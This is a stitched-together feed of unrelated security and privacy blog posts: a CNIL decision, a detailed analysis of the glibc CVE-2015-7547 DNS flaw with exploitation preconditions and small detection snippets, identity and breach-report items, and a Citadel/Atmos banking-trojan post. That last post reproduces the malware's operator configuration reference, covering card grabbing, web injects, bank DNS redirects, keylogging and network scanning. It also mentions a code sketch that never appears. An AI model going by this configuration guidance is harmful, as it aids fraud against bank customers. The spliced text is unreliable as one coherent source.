CNIL Issues Decision Regarding Data Processing for Litigation Purposes

On February 19, 2016, the French Data Protection Authority (“CNIL”) made public its new Single Authorization Decision No. 46 (“Single Authorization AU-46”). This decision relates to the data processing activities of public and private organizations with respect to the preparation, exercise and follow-up regarding disciplinary or court actions, and the enforcement of those actions.

The CNIL observed that, as part of their regular activities, companies may have to prepare and manage claims involving customers, vendors, employees or other individuals in order to defend their rights. In doing so, companies process personal data that is likely to include data relating to criminal offenses, convictions or security measures.

In principle, companies are not allowed to process such data under French data protection law. However, in a 2004 decision, the French Constitutional Court opined that this should not deprive companies of their right to judicial redress. The CNIL therefore stated that companies may process personal data relating to offenses, convictions and security measures, as victims of an offense. Such data processing requires the CNIL’s specific prior authorization. However, if the data processing complies with all the requirements laid down in Single Authorization AU-46, only a simplified registration must be filed with the CNIL.

Single Authorization AU-46 includes detailed requirements on the types of personal data that may be collected and processed, data retention periods, data recipients and security measures that must be implemented. If these requirements are not met, an authorization request must be filed with the CNIL.

The purpose of Single Authorization AU-46 is to reduce the administrative burden of companies’ registration formalities, in light of the future EU General Data Protection Regulation that will abolish their registration obligation.

I Might Be Afraid Of This Ghost

CVE-2015-7547 is not actually the first bug found in glibc’s DNS implementation.  A few people have privately asked me how this particular flaw compares to last year’s issue, dubbed “Ghost” by its finders at Qualys.  Well, here’s a list of what that flaw could not exploit:

apache, cups, dovecot, gnupg, isc-dhcp, lighttpd, mariadb/mysql, nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd, pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers, vsftpd, xinetd.

And here are the results from a few minutes of research on the new bug.

[Screenshot: results of a few minutes of research on CVE-2015-7547]

More is possible, but I think the point is made.  The reason why the new flaw is significantly more virulent is that:

  • This is a flaw in getaddrinfo(), which modern software actually uses nowadays for IPv6 compatibility, and
  • Ghost was actually a really “fiddly” bug, in a way CVE-2015-7547 just isn’t.

As it happens, Qualys did a pretty great writeup of Ghost’s mitigating factors, so I’ll just let the experts speak for themselves:

  • The gethostbyname*() functions are obsolete; with the advent of IPv6, recent applications use getaddrinfo() instead.
  • Many programs, especially SUID binaries reachable locally, use gethostbyname() if, and only if, a preliminary call to inet_aton() fails. However, a subsequent call must also succeed (the “inet-aton” requirement) in order to reach the overflow: this is impossible, and such programs are therefore safe.
  • Most of the other programs, especially servers reachable remotely, use gethostbyname() to perform forward-confirmed reverse DNS (FCrDNS, also known as full-circle reverse DNS) checks. These programs are generally safe, because the hostname passed to gethostbyname() has normally been pre-validated by DNS software:
    • “a string of labels each containing up to 63 8-bit octets, separated by dots, and with a maximum total of 255 octets.” This makes it impossible to satisfy the “1-KB” requirement.
    • Actually, glibc’s DNS resolver can produce hostnames of up to (almost) 1025 characters (in case of bit-string labels, and special or non-printable characters). But this introduces backslashes (‘\\’) and makes it impossible to satisfy the “digits-and-dots” requirement.

And:

In order to reach the overflow at line 157, the hostname argument must meet the following requirements:

  • Its first character must be a digit (line 127).
    – Its last character must not be a dot (line 135).
    – It must comprise only digits and dots (line 197) (we call this the “digits-and-dots” requirement).
  • It must be long enough to overflow the buffer. For example, the non-reentrant gethostbyname*() functions initially allocate their buffer with a call to malloc(1024) (the “1-KB” requirement).
  • It must be successfully parsed as an IPv4 address by inet_aton() (line 143), or as an IPv6 address by inet_pton() (line 147). Upon careful analysis of these two functions, we can further refine this “inet-aton” requirement:
    • It is impossible to successfully parse a “digits-and-dots” hostname as an IPv6 address with inet_pton() (‘:’ is forbidden). Hence it is impossible to reach the overflow with calls to gethostbyname2() or gethostbyname2_r() if the address family argument is AF_INET6.
    • Conclusion: inet_aton() is the only option, and the hostname must have one of the following forms: “a.b.c.d”, “a.b.c”, “a.b”, or “a”, where a, b, c, d must be unsigned integers, at most 0xfffffffful, converted successfully (ie, no integer overflow) by strtoul() in decimal or octal (but not hexadecimal, because ‘x’ and ‘X’ are forbidden).

Like I said, fiddly, thus giving Qualys quite a bit of confidence regarding what was and wasn’t exploitable.  By contrast, the constraints on CVE-2015-7547 are “IPv6 compatible getaddrinfo”.  That ain’t much.  The bug doesn’t even care about the payload, only how much is delivered and if it had to retry.

It’s also a much larger malicious payload we get to work with.  Ghost was four bytes (not that that’s not enough, but still).

In Ghost’s defense, we know that flaw can traverse caches, requiring far less access for attackers.  CVE-2015-7547 is weird enough that we’re just not sure.

A Skeleton Key of Unknown Strength

TL;DR:  The glibc DNS bug (CVE-2015-7547) is unusually bad.  Even Shellshock and Heartbleed tended to affect things we knew were on the network and knew we had to defend.  This affects a universally used library (glibc) at a universally used protocol (DNS).  Generic tools that we didn’t even know had network surface (sudo) are thus exposed, as is software written in programming languages designed explicitly to be safe. Who can exploit this vulnerability? We know unambiguously that an attacker directly on our networks can take over many systems running Linux.  What we are unsure of is whether an attacker anywhere on the Internet is similarly empowered, given only the trivial capacity to cause our systems to look up addresses inside their malicious domains.

We’ve investigated the DNS lookup path, which requires the glibc exploit to survive traversing one of the millions of DNS caches dotted across the Internet.  We’ve found that it is neither trivial to squeeze the glibc flaw through common name servers, nor is it trivial to prove such a feat is impossible.  The vast majority of potentially affected systems require this attack path to function, and we just don’t know yet if it can.  Our belief is that we’re likely to end up with attacks that work sometimes, and we’re probably going to end up hardening DNS caches against them with intent rather than accident.  We’re likely not going to apply network level DNS length limits because that breaks things in catastrophic and hard to predict ways.

This is a very important bug to patch, and it is good we have some opportunity to do so.

It’s problematic that, a decade after the last DNS flaw that took a decade to fix, we have another one.  It’s time we discover and deploy architectural mitigations for these sorts of flaws with more assurance than technologies like ASLR can provide.  The hard truth is that if this code was written in JavaScript, it wouldn’t have been vulnerable.  We can do better than that.  We need to develop and fund the infrastructure, both technical and organizational, that defends and maintains the foundations of the global economy.

Click here if you’re a DNS expert and don’t need to be told how DNS works.
Click here if your interests are around security policy implications and not the specific technical flaw in question.

Update:  Click here to learn how this issue compares to last year’s glibc DNS flaw, Ghost.

=====

Here is a galaxy map of the Internet.  I helped the Opte project create this particular one.

[Image: the Opte project’s galaxy map of the Internet]

And this galaxy is Linux – specifically, Ubuntu Linux, in a map by Thomi Richards, showing how each piece of software inside of it depends on each other piece.

[Image: Thomi Richards’s map of Ubuntu software dependencies]

There is a black hole at the center of this particular galaxy – the GNU C Standard Library, or glibc.  And at this center, in this black hole, there is a flaw.  More than your average or even extraordinary flaw, it’s affecting a shocking amount of code.  How shocking?

[Screenshot: the amount of code depending on glibc]

I’ve seen a lot of vulnerabilities, but not too many that create remote code execution in sudo.  When DNS ain’t happy, ain’t nobody happy.  Just how much trouble are we in?

We’re not quite sure.

Background

Most Internet software is built on top of Linux, and most Internet protocols are built on top of DNS.  Recently, Redhat Linux and Google discovered some fairly serious flaws in the GNU C Library, used by Linux to (among many other things) connect to DNS to resolve names (like google.com) to IP addresses (like 8.8.8.8).  The buggy code has been around for quite some time – since May 2008 – so it’s really worked its way across the globe.  Full remote code execution has been demonstrated by Google, despite the usual battery of post-exploitation mitigations like ASLR, NX, and so on.

What we know unambiguously is that an attacker who can monitor DNS traffic between most (but not all) Linux clients, and a Domain Name Server, can achieve remote code execution independent of how well those clients are otherwise implemented.  (Android is not affected.)  That is a solid critical vulnerability by any normal standard.

Actionable Intelligence

Ranking exploits is silly.  They’re not sports teams.  But generally, what you can do is actually less important than who you have to be to do it.  Bugs like Heartbleed, Shellshock, and even the recent Java Deserialization flaws ask very little of attackers – they have to be somewhere on a network that can reach their victims, maybe just anywhere on the Internet at large.  By contrast, the unambiguous victims of glibc generally require their attackers to be close by.

You’re just going to have to believe me when I say that’s less of a constraint than you’d think, for many classes of attacker you’d actually worry about.  More importantly though, the scale of software exposed to glibc is unusually substantial.  For example:

[Screenshot: language runtimes exposed through glibc]

That’s JavaScript, Python, Java, and even Haskell blowing right up.  Just because they’re “memory-safe” doesn’t mean their runtime libraries are, and glibc is the big one under Linux they all depend on.  (Not that other C libraries should be presumed safe.  Ahem.)

There’s a reason I’m saying this bug exposes Linux in general to risk.  Even your paranoid solutions leak DNS – you can route everything over a VPN, but you’ve still got to discover where you’re routing it to, and that’s usually done with DNS.  You can push everything over HTTPS, but what’s that text after the https://?  It’s a DNS domain.

Importantly, the whole point of entire sets of defenses is that there’s an attacker on the network path.  That guy just got a whole new set of toys, against a whole new set of devices.  Everyone protects apache, who protects sudo?

So, independent of whatever else may be found, Florian, Fermin, Kevin, and everyone else at Redhat and Google did some tremendous work finding and repairing something genuinely nasty.  Patch this bug with extreme prejudice.  You’ll have to reboot everything, even if it doesn’t get worse.

It might get worse.

The Hierarchy

DNS is how this Internet (there were several previous attempts) achieves cross-organizational interoperability.  It is literally the “identity” layer everything else builds upon; everybody can discover Google’s mail server, but only Google can change it.  Only they have the delegated ownership rights for gmail.com and google.com.  Those rights were delegated by Verisign, who owns .com, who themselves received that exclusive delegation from ICANN, the Internet Corporation for Assigned Names and Numbers.

The point is not to debate the particular trust model of DNS.  The point is to recognize that it’s not just Google who can register domains; attackers can literally register badguy.com and host whatever they want there.  If a DNS vulnerability could work through the DNS hierarchy, we would be in a whole new class of trouble, because it is just extraordinarily easy to compel code that does not trust you to retrieve arbitrary domains from anywhere in the DNS.  You connect to a web server, it wants to put your domain in its logs, it’s going to look you up.  You connect to a mail server, it wants to see if you’re a spammer, it’s going to look you up.  You send someone an email, they reply.  How does their email find you?  Their systems are going to look you up.

It would be unfortunate if those lookups led to code execution.

Once, I gave a talk to two hundred software developers.  I asked them, how many of you depend on DNS?  Two hands go up.  I then asked, how many of you expect a string of text like google.com to end up causing a connection to Google?  198 more hands.  Strings containing domain names happen all over the place in software, in all sorts of otherwise safe programming languages.  Far more often than not, those strings not only find their way to a DNS client, but specifically to the code embedded in the operating system (the one thing that knows where the local Domain Name Server is!).  If that embedded code, glibc, can end up receiving from the local infrastructure traffic similar enough to what a full-on local attacker would deliver, we’re in a lot more trouble.  Many more attackers can cause lookups to badguy.com, than might find themselves already on the network path to a target.
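To make concrete how little it takes: on Linux, CPython’s socket.getaddrinfo() is a thin wrapper over glibc’s getaddrinfo(), and passing AF_UNSPEC requests both A and AAAA records, which is exactly the dual-query path this bug lives in. Any string that reaches a line like the following reaches glibc (example.com stands in for badguy.com):

import socket

# On Linux this calls straight into glibc's getaddrinfo(); AF_UNSPEC
# asks for IPv4 and IPv6 results, triggering parallel A/AAAA lookups.
for family, _, _, _, sockaddr in socket.getaddrinfo(
        "example.com", 80, socket.AF_UNSPEC, socket.SOCK_STREAM):
    print(family, sockaddr)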

Domain Name Servers

Glibc is what is known as a “stub resolver”.  It asks a question, it gets an answer, somebody else actually does most of the work running around the Internet bouncing through ICANN to Verisign to Google.  These “somebody elses” are Domain Name Servers, also known as caching resolvers.  DNS is an old protocol – it dates back to 1983 – and comes from a world where bandwidth was so constrained that every bit mattered, even during protocol design.  (DNS got 16 bits in a place so TCP could get 32.  “We were young, we needed the bits” was actually a thing.)  These caching resolvers actually enforce a significant amount of rules upon what may or may not flow through the DNS.  The proof of concept delivered by Google essentially delivers garbage bytes.  That’s fine on the LAN, where there’s nothing getting in the way.  But name servers can essentially be modeled as scrubbing firewalls – in most (never all) environments, traffic that is not protocol compliant is just not going to reach stubs like glibc.  Certainly that Google Proof of Concept isn’t surviving any real world cache.

Does that mean nothing will?  As of yet, we don’t actually know.  According to Redhat:

A back of the envelope analysis shows that it should be possible to write correctly formed DNS responses with attacker controlled payloads that will penetrate a DNS cache hierarchy and therefore allow attackers to exploit machines behind such caches.

I’m just going to state outright:  Nobody has gotten this glibc flaw to work through caches yet.  So we just don’t know if that’s possible.  Actual exploit chains are subject to what I call the MacGyver effect.   For those unfamiliar, MacGyver was a 1980’s television show that showed a very creative tinkerer building bombs and other such things with tools like chocolate.  The show inspired an entire generation of engineers, but did not lead to a significant number of lost limbs because there was always something non-obvious and missing that ultimately prevented anything from working.  Exploit chains at this layer are just a lot more fragile than, say, corrupted memory.  But we still go ahead and actually build working memory corruption exploits, because some things are just extraordinarily expensive to fix, and so we better be sure there’s unambiguously a problem here.

At the extreme end, there are discussions happening about widespread DNS filters across the Internet – certainly in front of sensitive networks.  Redhat et al did some great work here, but we do need more than the back of the envelope.  I’ve personally been investigating cache traversal variants of this attack.  Here’s what I can report after a day.

Cache Attacks

Somewhat simplified, the attacks depend on:

  • A buffer being filled with about 2048 bytes of data from a DNS response
  • The stub retrying, for whatever reason
  • Two responses ultimately getting stacked into the same buffer, with over 2048 bytes from the wire

The flaw is linked to the fact that the stack has two outstanding requests at the same time – one for IPv4 addresses, and one for IPv6 addresses.  Furthermore DNS can operate over both UDP and TCP, with the ability to upgrade from the former to the latter.  There is error handling in DNS, but most errors and retries are handled by the caching resolver, not the stub. That means any weird errors just cause the (safer, more properly written) middlebox to handle the complexity, reducing degrees of freedom for hitting glibc.

Given that rough summary of the constraints, here’s what I can report.  This CVE is easily the most difficult to scope bug I’ve ever worked on, despite it being in a domain I am intimately familiar with.  The trivial defenses against cache traversal are easily bypassable; the obvious attacks that would generate cache traversal are trivially defeated.  What we are left with is a morass of maybe’s, with the consequences being remarkably dire (even my bug did not yield direct code execution).  Here’s what I can say at present time, with thanks to those who have been very generous with their advice behind the scenes.

  • The attacks do not need to be garbage that could never survive a DNS cache, as they are in the Google PoC. It’s perfectly legal to have large A and AAAA responses that are both cache-compatible and corrupt client memory.  I have this working well.
  • The attacks do not require UDP or EDNS0. Traditional DNS has a 512 byte limit, notably less than the 2048 bytes required.  Some people (including me) thought that since glibc doesn’t issue the EDNS0 request that declares a larger buffer, caching resolvers would not provide sufficient data to create the required failure state.  Sure, if the attack was constrained to UDP as in the Google PoC.  But not only does TCP exist, but we can set the TC “Truncation” bit to force an upgrade to the protocol with more bandwidth.  This most certainly does traverse caches.  (A sketch of these two protocol details follows this list.)
  • There are ways of making the necessary retry occur, even through TCP. We’re still investigating them, as it’s a fundamental requirement for the attack to function.  (No retry, no big write to small buf.)
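To make the UDP-to-TCP upgrade concrete, here is an illustrative Python sketch (protocol mechanics only, nothing exploit-specific) of the two details involved: the TC flag living at bit 0x0200 of the DNS header’s flags word, and TCP’s 2-byte length prefix, the field that frees a response from UDP’s traditional 512-byte ceiling:

import struct

# DNS header: ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT (all 16-bit).
txid, flags = 0x1234, 0x8200  # QR=1 (response) | TC=1 (truncated)
header = struct.pack(">HHHHHH", txid, flags, 1, 0, 0, 0)
print("TC set:", bool(struct.unpack(">H", header[2:4])[0] & 0x0200))

# Over TCP every DNS message is prefixed with its 16-bit length,
# so an answer can be far larger than UDP's classic 512 bytes.
body = b"\x00" * 2048  # stand-in for a large, TCP-only answer
tcp_msg = struct.pack(">H", len(body)) + body
print("TCP length prefix:", struct.unpack(">H", tcp_msg[:2])[0])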

Where I think we’re going to end up, around 24 (straight) hours of research in, is that some networks are going to be vulnerable to some cache traversal attacks sometimes, following the general rule of “attacks only get better”.  That rule usually only applies to crypto vulns, but on this half-design half-implementation vuln, we get it here too.  This is in contrast to the on-path attackers, who “just” need to figure out how to smash a 2016 stack and away they go.  There’s a couple comments I’d like to make, which summarize down to “This may not get nasty in days to weeks, but months to years has me worried.”

  • Low reliability attacks become high reliability in DNS, because you can just do a lot of them very quickly. Even without forcing an endpoint to hammer you through some API, name servers have all sorts of crazy corner cases where they blast you with traffic quickly, and stop only when you’ve gotten data successfully in their cache.  Load causes all sorts of weird and wooly behavior in name servers, so proving something doesn’t work in the general case says literally nothing about edge case behavior.
  • Low or no Time To Live (TTL) mean the attacker can disable DNS caching, eliminating some (but not nearly all) protections one might assume caching creates.  That being said, not all name servers respect a zero TTL, or even should.
  • If anything is going to stop actual cache traversing exploitability, it’s that you just have an absurd amount more timing and ordering control directly speaking to clients over TCP and UDP, than you do indirectly communicating with the client through a generally protocol enforcing cache. That doesn’t mean there won’t be situations where you can cajole the cache to do your bidding, even unreliably, but accidental defenses are where we’re at here.
  • Those accidental defenses are not strong. They’re accidents, in the way DNS cache rules kept my own attacks from being discovered.  Eventually we figured out we could do other things to get around those defenses and they just melted in seconds.  The possibility that a magic nasty payload pushes a major nameserver or whatever into some state that quickly and easily knocks stuff over, on the scale of months to years, is non-trivial.
  • Stub resolvers are not just weak, they’re kind of designed to be that way. The whole point is you don’t need a lot of domain specific knowledge (no pun intended) to achieve resolution over DNS; instead you just ask a question and get an answer.  Specifically, there’s a universe of DNS clients that don’t randomize ports (or even transaction id’s).  You really don’t want random Internet hosts poking your clients spoofing your name servers.  Protecting against spoofed traffic on the global Internet is difficult; preventing traffic spoofing from outside networks using internal addresses is on the edge of practicality.

Let’s talk about suggested mitigations, and then go into what we can learn policy-wise from this situation.

Length Limits Are Silly Mitigations

No other way to say it.  Redhat might as well have suggested filtering all AAAA (IPv6) records – might actually be effective, as it happens, but it turns out security is not the only engineering requirement at play.  DNS has had to engineer several mechanisms for sending more than 512 bytes, and not because it was a fun thing to do on a Saturday night.  JavaScript is not the only thing that’s gotten bigger over the years; we are putting more and more in there and not just DNSSEC signatures either.  What is worth noting is that IT, and even IT Security, has actually learned the very very hard way not to apply traditional firewalling approaches to DNS.  Basically, as a foundational protocol it’s very far away from normal debugging interfaces.  That means, when something goes wrong – like, somebody applied a length limit to DNS traffic who was not themselves a DNS engineer – there’s this sudden outage that nobody can trace for some absurd amount of time.  By the time the problem gets traced…well, if you ever wondered why DNS doesn’t get filtered, that is why.

And ultimately, any DNS packet filter is a poor version of what you really want, which is an actual protocol enforcing scrubbing firewall, i.e. a name server that is not a stub, though it might be a forwarder (meaning it enforces all the rules and provides a cache, but doesn’t wander around the Internet resolving names).  My expectations for mitigations, particularly as we actually start getting some real intelligence around cache traversing glibc attacks, are:

  • We will put more intelligent resolvers on more devices, such that glibc is only talking to the local resolver not over the network, and
  • Caching resolvers will learn how to specially handle the case of simultaneous A and AAAA requests. If we’re protected from traversing attacks it’s because the attacker just can’t play a lot of games between UDP and TCP and A and AAAA responses.  As we learn more about when the attacks can traverse caches, we can intentionally work to make them not.

Local resolvers are popular anyway, because they mean there’s a DNS cache improving performance.  A large number of embedded routers are already safe against the verified on-path attack scenario due to their use of dnsmasq, a common forwarding cache.

Note that technologies like DNSSEC are mostly orthogonal to this threat; the attacker can just send us signed responses crafted specifically to break us.  I say mostly because one mode of DNSSEC deployment involves the use of a local validating resolver; such resolvers are also DNS caches that insulate glibc from the outside world.

There is the interesting question of how to scan and detect nodes on your network with vulnerable versions of glibc.  I’ve been worried for a while we’re only going to end up fixing the sorts of bugs that are aggressively trivial to detect, independent of their actual impact to our risk profiles.  Short of actually intercepting traffic and injecting exploits I’m not sure what we can do here.  Certainly one can look for simultaneous A and AAAA requests with identical source ports and no EDNS0, but that’s going to stay that way even post patch.  Detecting what on our networks still needs to get patched (especially when ultimately this sort of platform failure infests the smallest of devices) is certain to become a priority – even if we end up making it easier for attackers to detect our faults as well.
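As a rough starting point for that kind of looking, here is a sketch of the A/AAAA heuristic just described, assuming scapy and privileges to sniff. Note that it fingerprints glibc-style resolution, which looks the same after patching, rather than vulnerability itself:

from scapy.all import sniff, DNS, IP, UDP

seen = {}  # (src_ip, sport, qname) -> set of qtypes observed

def check(pkt):
    if pkt.haslayer(IP) and pkt.haslayer(DNS) and pkt[DNS].qr == 0 and pkt[DNS].qd is not None:
        if pkt[DNS].arcount:            # OPT record present: EDNS0, not the bare pattern
            return
        key = (pkt[IP].src, pkt[UDP].sport, pkt[DNS].qd.qname)
        qtypes = seen.setdefault(key, set())
        qtypes.add(pkt[DNS].qd.qtype)
        if {1, 28} <= qtypes:           # A (1) and AAAA (28) sharing one source port
            print("glibc-style A/AAAA pair:", key)

sniff(filter="udp port 53", prn=check, store=False)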

If you’re looking for actual exploit attempts, don’t just look for large DNS packets.  UDP attacks will actually be fragmented (normal IP packets cannot carry 2048 bytes) and you might forget DNS can be carried over TCP.  And again, large DNS replies are not necessarily malicious.

And thus, we end up at a good transition point to discuss security policy.  What do we learn from this situation?

The Fifty Thousand Foot View

Patch this bug.  You’ll have to reboot your servers.  It will be somewhat disruptive.  Patch this bug now, before the cache traversing attacks are discovered, because even the on-path attacks are concerning enough.  Patch.  And if patching is not a thing you know how to do, automatic patching needs to be something you demand from the infrastructure you deploy on your network.  If it might not be safe in six months, why are you paying for it today?

It’s important to realize that while this bug was just discovered, it’s not actually new.  CVE-2015-7547 has been around for eight years.  Literally, six weeks before I unveiled my own grand fix to DNS (July 2008), this catastrophic code was committed.

Nobody noticed.

The timing is a bit troublesome, but let’s be realistic:  there’s only so many months to go around.  The real issue is it took almost a decade to fix this new issue, right after it took a decade to fix my old one (DJB didn’t quite identify the bug, but he absolutely called the fix).  The Internet is not less important to global commerce than it was in 2008. Hacker latency continues to be a real problem.

What maybe has changed over the years is the strangely increasing amount of talk about how the Internet is perhaps too secure.  I don’t believe that, and I don’t believe anyone in business (or even with a credit card) does either.  But the discussion on cybersecurity seems dominated by the necessity of insecurity.  Did anyone know about this flaw earlier?   There’s absolutely no way to tell.  We can only know we need to be finding these bugs faster, understanding these issues better, and fixing them more comprehensively.

We need to not be finding bugs like this, eight years from now, again.

(There were clear public signs of impending public discovery of this flaw, so do not take my words as any form of criticism for the release schedule of this CVE.)

My concerns are not merely organizational.  I do think we need to start investing significantly more in mitigation technologies that operate before memory corruption has occurred.  ASLR, NX, Control Flow Guard – all of these technologies are greatly impressive, at showing us who our greatly impressive hackers are.  They’re not actually stopping code execution from being possible.  They’re just not.

Somewhere between base arithmetic and x86 is a sandbox people can’t just walk in and out of.  To put it bluntly, if this code had been written in JavaScript – yes, really – it wouldn’t have been vulnerable.  Even if this network exposed code remained in C, and was just compiled to JavaScript via Emscripten, it still would not have been vulnerable.  Efficiently microsandboxing individual codepaths is a thing we should start exploring.  What can we do to the software we deploy, at what cost, to actually make exploitation of software flaws actually impossible, as opposed to merely difficult?

It is unlikely this is the only platform threat, or even the only threat in glibc.  With the Internet of Things spreading extraordinarily, perhaps it’s time to be less concerned about being able to spy on every last phone call and more concerned about how we can make sure innovators have better environments to build upon. I’m not merely talking about the rather “frothy” software stacks adorning the Internet of Things, with Bluetooth and custom TCP/IP and so on.  I’m talking about maintainability.  When we find problems — and we will — can we fix them?  This is a problem that took Android too long to start seriously addressing, but they’re not the only ones.  A network where devices eventually become existential threats is a network that eventually ceases to exist.  What do we do for platforms to guarantee that attack windows close?  What do we do for consumers and purchasing agents so they can differentiate that which has a maintenance warranty, and that which does not?

Are there insurance structures that could pay out, when a glibc level patch needs to be rolled out?

There’s a level of maturity that can be brought to the table, and I think should.  There are a lot of unanswered questions about the scope of this flaw, and many others, that perhaps neither vendors nor volunteer researchers are in the best position to answer.  We can do better building the secure platforms of the future.  Let’s start here.

Next Generation IDaaS: Moving From Tactical to Strategic

Today, I posted a blog entry to the Oracle Identity Management blog titled Next Generation IDaaS: Moving From Tactical to Strategic. In the post, I examine the evolution of IDaaS and look toward the next generation of Enterprise Identity and Access Management. I believe that the adoption of IDaaS by enterprises has typically been a reactive, tactical response to the quick emergence of SaaS (and the associated loss of control). The next generation of IDaaS will be more strategic and carefully planned to better meet evolving enterprise requirements.

Note that I'm not talking about the technology. Nor am I talking about consumer use-cases or developer adoption of outsourced authentication. In this post, I'm looking at IDaaS from the perspective of enterprise IAM and the on-going Digital Transformation.

Here are a few quotes that capture the essence:
First generation Identity as a Service (IDaaS) was a fashion statement that’s on its way out. It was cool while it lasted. And it capitalized on some really important business needs. But it attempted to apply a tactical fix to a strategic problem.

Security functions are coalescing into fewer solutions that cover more ground with less management overhead. Digital Enterprises want more functionality from fewer solutions.

The next generation of IAM is engineered specifically for Digital Business providing a holistic approach that operates in multiple modes. It adapts to user demands with full awareness of the value of the resources being accessed and the context in which the user is operating. Moving forward, you won’t need different IAM products to address different user populations (like privileged users or partners) and you won’t stand up siloed IDaaS solutions to address subsets of target applications (like SaaS).

Next generation IDaaS builds on all the promises of cloud computing but positions itself strategically as a component of a broader, more holistic IAM strategy. Next-gen IDaaS fully supports the most demanding Digital Business requirements. It’s not a stop-gap and it’s not a fashion statement. It’s an approach enabling a new generation of businesses that will take us all further than we could have imagined.

California Attorney General Releases Report Defining “Reasonable” Data Security

On February 16, 2016, California Attorney General Kamala D. Harris released the California Data Breach Report 2012-2015 (the “Report”) which, among other things, provides (1) an overview of businesses’ responsibilities regarding protecting personal information and reporting data breaches and (2) a series of recommendations for businesses and state policy makers to follow to help safeguard personal information. Importantly, the Report states that, “[t]he failure to implement all the [Center for Internet Security’s Critical Security] Controls that apply to an organization’s environment constitutes a lack of reasonable security” under California’s information security statute. Cal. Civ. Code § 1798.81.5(b) requires that “[a] business that owns, licenses, or maintains personal information about a California resident shall implement and maintain reasonable security procedures and practices appropriate to the nature of the information, to protect the personal information from unauthorized access, destruction, use, modification, or disclosure.” The Center for Internet Security’s Critical Security Controls are a set of 20 cybersecurity defensive measures meant to “detect, prevent, respond to, and mitigate damage from cyber attacks.”

The Report also provides the following recommendations:

  • Organizations should make multi-factor authentication available on consumer-facing online accounts that contain sensitive personal information.
  • Organizations, particularly in the health care industry, should consistently use strong encryption to protect personal information on laptops and other portable devices, and should consider it for desktop computers.
  • Organizations should encourage individuals affected by a breach of Social Security numbers or driver’s license numbers to place a fraud alert on their credit files and make this option very prominent in their breach notices.
  • State policy makers should collaborate to harmonize state breach laws on some key dimensions. Such an effort could reduce the compliance burden for companies, while preserving innovation, maintaining consumer protections and retaining jurisdictional expertise.

Citadel 0.0.1.1 (Atmos)


Guys at JPCERT, thank you very much! (有難う御座います!)
They released an update to their Citadel decryptor to make it compatible with the 0.0.1.1 sample.


Citadel 0.0.1.1 doesn't have a lot of documentation, so the time has come to talk about it.
Personally, I know this malware under the name 'Atmos' (be ready for a name war in 3, 2, 1...)
 
The first sample I was aware of is the one spotted by tilldenis here in July 2015.

I re-observed this campaign in November 2015 with the same 'usca'.
You can find a technical description of the product here: http://pastebin.com/raw/cAqbrqAS

Here is a small part translated to English related to configuration and commands:
3. Configuration

url_config1-10 [up to 10 links to configuration files; 1 main for your web admin panel and 9 spare ones. To save resources, use the InterGate button in the builder to place config files on different links without setting up an admin panel. Spare configs will be requested if the main one is not available during the first EXE launch. Don't forget to put the EXE and config files in the 'files/' folder]
timer_config 4 9 [Config file refresh timer in minutes | Retry interval]
timer_logs 3 6 [Logs upload timer in minutes | Retry in _ minutes]
timer_stats 4 8 [New command receiving and statistics upload timer in minutes | Retry in _ minutes]
timer_modules 4 9 [Additional configuration files receiving timer | Retry in _ minutes. Recommending to use the same setting as in timer_config]
timer_autoupdate 8 [EXE file renewal timer in hours]
insidevm_enable 0/1 [Enable execution in virtual machine: 1 - yes | 0 - no]
disable_antivirus 0/1 [1 - Disable built-in 'AntiVirus' that allows to delete previous versions of Zeus/Citadel/Citra after EXE launch | 0 - leave enabled (recommended)]
disable_httpgrabber 0/1 [1 - Disable http:// mask grabber in IE | 0 - Enable http:// mask grabber in IE]
enable_luhn10_get 0/1 [Enable CC grabber in GET-requests http/https]
remove_certs 0/1 [Enable certificate deletion in IE storage]
report_software 0/1 [1 - Enable stats collection for Installed Software, Firewall version, Antivirus version | 0 - Disable]
disable_tcpserver 0/1 [1 - Enable opening SOCKS5 port (not Backconnect!) | 0 - Disable]
enable_luhn10_post 0/1 [Enable CC grabber in POST-requests http/https | see the Luhn sketch after this configuration list]
disable_cookies 0/1 [1 - Disable IE/FF cookies-storage upload | 0 - Enable | use_module_ffcookie - duplicates the same]
file_webinjects "injects.txt" [File containing injects. Installed right after successful config files installation. Renewal timer is set in timer_config]
url_webinjects "localhost/file.php" [Path to 'file.php' file. Feature of 'Web-Injects' section for remote instant inject loading]
AdvancedConfigs [Links to backup configuration files. Works if !bot is already installed on the system! and first url_config is no longer accessible]
entry "WebFilters" [Set of different filters for URLs: video(# character), screenshot(single @ character - screenshot sequence after a click in the active zone. double @ character '@@' - Full size screenshot), ignore (! character), POST requests logging (P character), GET request logging (G character)]
entry HttpVipUrls [URL blacklist. By default the following masks are NOT written to the logs: "facebook*", "*twitter*", "*google*". Adding individual lines with these masks will enable logging for them again]
entry "DnsFilters" [System level DNS redirect, mask example - *bankofamerica.com*=159.45.66.100. Now when going to bankofamerica.com - wellsfargo.com will be displayed. Not recommending blocking AV sites to avoid triggering pro-active defenses]
entry "CmdList" [List of system commands after launch and uploading them to the server]
entry "Keylogger" [List of process names for KeyLogger. Time parameter defines the time to work in hours after the process initialization]
entry "Video" [Video recording settings | x_scale/y_scale - video resolution | fps - frame per second, 1 to 5 |  kbs - frame refresh rate, 5 to 60 | cpu 0-16 CPU loading | time - time to record in seconds | quality 0-100 - picture quality]
entry "Videologger" - [processes "" - list of processes to trigger video recording. Possible to use masks, for example calc.exe or *calc*]
entry "MoneyParser" [Balance grabber settings | include "account,bank,balance" - enable balance parsing if https:// page contains one of the following key words. | exclude "casino,poker,game" - do NOT perform parsing if one of the following words is found]
entry "FileSearch" [File search by given mask. The report will be stored in 'File Hunter' folder. Keywords can be a list of files or patterns ** to for on the disk. For example, multibit.exe will search for exact match on filename.fileextension, *multibit* will report on anything found matching this pattern. | excludes_name - exclude filenames/fileextensions from search. excludes_path - exclude system directories macros, like, Windows/Program Files, etc | minimum_year - file creation/change date offset. The search task is always on. Remove all the parameters from this section to disable it.]
entry "NetScan" [hostname "host-to-scan.com" - list of local/remote IP addresses to scan. scantype "0" - sets the IP address range, for example, scantype "0" scans a single IP in the 'hostname', scantype "1" creates a full scan of class C network 10.10.10.0-255, scantype "2" creates a full scan of class B network 10.10.0-255.0-255]
Example 1 {hostname "10.10.0-255.0-255" addrtype "ipv4" porttype "tcp" ports "1-5000" scantype "2"}
Example 2 {hostname "10.10.1.0-255" addrtype "ipv4" porttype "tcp" ports "1-5000" scantype "1"}
